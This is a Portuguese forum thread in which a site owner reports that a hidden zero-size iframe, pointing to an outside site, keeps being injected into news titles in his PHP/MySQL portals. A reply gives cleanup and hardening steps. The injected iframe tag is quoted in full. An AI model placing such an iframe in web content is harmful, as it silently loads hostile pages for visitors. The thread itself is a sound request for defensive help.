Ir para conteúdo
Fórum Script Brasil
  • 0

Problemas de segurança PHP e MYSQL (alguém tem um similar ao meu ?)


Gabriel Vince

Pergunta

Olá,

Gostaria de apontar um erro, e gostaria de saber se alguém tem um problema similar

Sempre que eu coloco uma noticia (via PHP e MYSQL) nos portais que tenho hospedado, momentos depois, é incluído no campo "titulo" da notícia o seguinte comando

"<iframe src=http://www.novoflashplayer.com/auto.html height=0 width=0 scrolling=no frameborder=0></iframe>"

alguém está invadindo o banco de dados e inserindo isso antes do título ou depois ...

Gostaria de saber o que vocês fariam com essa falha de segurança...

Considerando que

Já tentei trocar a senha de todos os bancos de dados dos portais, porém o problema permanece...

Link para o comentário
Compartilhar em outros sites

1 resposta a esta questão

Posts Recomendados

  • 0
Olá,

Gostaria de apontar um erro, e gostaria de saber se alguém tem um problema similar

Sempre que eu coloco uma noticia (via PHP e MYSQL) nos portais que tenho hospedado, momentos depois, é incluído no campo "titulo" da notícia o seguinte comando

"<iframe src=http://www.novoflashplayer.com/auto.html height=0 width=0 scrolling=no frameborder=0></iframe>"

alguém está invadindo o banco de dados e inserindo isso antes do título ou depois ...

Gostaria de saber o que vocês fariam com essa falha de segurança...

Considerando que

Já tentei trocar a senha de todos os bancos de dados dos portais, porém o problema permanece...

1°) limpar seu computador pessoal, ou o computador que utiliza para desenvolver, e acessar seu sistema.

2°) configurar seu firewall, antivirus, e passar um bom adware.

3°) substitua os arquivos nos servidores pelos seus backups nativos. caso não tenha nenhum passe um pente fino nos scripts(dependendo do sistema vai ser osso.).

4°) verifique no seu banco de dados os usuarios com previlegios e certifique que todas as contas tenham precedentes.

Pelo que relatou é provavel que o seu servidor tenha sido invadido e implatado um backdoor ou então a sua maquina a utiliza para acessar as suas contas está rodando um keyloger que ta enviando todas as informações para um malfeitor.

até mais

Link para o comentário
Compartilhar em outros sites

Participe da discussão

Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.

Visitante
Responder esta pergunta...

×   Você colou conteúdo com formatação.   Remover formatação

  Apenas 75 emoticons são permitidos.

×   Seu link foi incorporado automaticamente.   Exibir como um link em vez disso

×   Seu conteúdo anterior foi restaurado.   Limpar Editor

×   Você não pode colar imagens diretamente. Carregar ou inserir imagens do URL.



  • Estatísticas dos Fóruns

    • Tópicos
      152,3k
    • Posts
      652,6k
×
×
  • Criar Novo...